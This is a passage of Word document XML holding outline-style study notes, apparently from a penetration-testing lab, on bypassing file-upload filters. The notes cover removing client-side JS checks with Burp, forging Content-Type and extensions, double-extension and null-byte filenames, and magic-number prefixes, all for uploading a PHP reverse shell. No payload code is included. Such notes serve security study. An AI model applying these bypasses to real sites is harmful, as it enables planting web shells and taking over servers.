      <w:r w:rsidRPr="00F512ED">
        <w:t>Strip out JS filter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3E1593" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Intercept and modify the file upload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71CE6EFB" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Burp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1784976F" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Send the file directly to the upload point</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B247BA" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Using curl, post data directly to page containing the code for handling the files upload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56769292" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Syntax: curl -X POST -F “submit:&lt;value&gt;” -F “&lt;file-parameter&gt;:@&lt;path-to-file&gt;”&lt;site&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE1C960" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Intercept successful upload using Burp or console to see parameters being used in the upload to be slotted in above command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F735A6" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Search source code for JS function used for content filtering client-side</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD20FFA" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Whitelisting using != check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64BBA83C" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Attempt file upload to confirm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E31EB67" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Start burpsuite and reload page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C208D96" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t xml:space="preserve">Find servers response </w:t>
      </w:r>
      <w:r w:rsidRPr="00F512ED">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="00F512ED">
        <w:t xml:space="preserve"> right click intercepted data &gt; “Do Intercept” &gt; “Response to this Request”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E46BAF" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Forward</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1104219F" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>View server’s response to this request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668A8CC7" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:lastRenderedPageBreak/>
        <w:t>Delete, comment out, break JS function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C479B16" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Forward</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1215914F" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Burpsuite will not intercept any external JS files that the web page is loading by default</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60742FFB" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>To edit script outside main page being loaded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6461976F" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Options &gt; Intercept Client Requests &gt; edit condition of the first line to remove “^js$|”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFB62B5" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Upload reverse shell with incorrect extension, such as .jpeg, intercept upload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D066403" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t xml:space="preserve">Change Content-Type: image/jpeg </w:t>
      </w:r>
      <w:r w:rsidRPr="00F512ED">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="00F512ED">
        <w:t xml:space="preserve"> text/x-php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5937B203" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Change file extension from .jpeg to .php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B4FEA5" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Forward</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6299ECCF" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Bypassing Server-Side Filtering: File Extensions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461EBE7B" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Perform testing to conceive idea of what is or is not allowed through the filter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247E4323" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Gradually construct payload which conforms to restrictions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE25003" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Bypasses are dependent on blacklists</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772442B3" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Searching for last period to find extension</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451FD566" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>First period in filename</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714A7402" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Splitting filename at each period and checking to see if any blacklisted extensions show up</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50515548" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Extension filters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B417C01" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Certain extensions have alternates that serve the same function and can bypass filter, however webpage may not be configured to read these extensions properly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3F0BD3" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Start legitimate and work inward</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB59935" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Try to find extensions that can be executed and are not filtered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C37453" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Try using combo extensions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69526778" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Ex. if jpg is OK but php is not</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19586633" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>File.jpg.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5572D0" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Null byte (file.php%00.gif)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C228FEC" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Php5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F81C0A" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Filter may search for first period only and defer to using the jpg portion to OK upload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D58742B" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Enumerate and see what is allowed and what is blocked and craft payload which can pass criteria</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156D4282" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Bypassing Server-Side Filtering: Magic Numbers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9D2123" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Effective against PHP but can fail against other types of webserver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760D001F" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Adding magic number of a known OK file to top of shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCA9F3E" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>List of signatures on Wikipedia</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574C02A3" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Use “file” command to check file type of shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0DFD76" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>PHP?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C14DF8" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
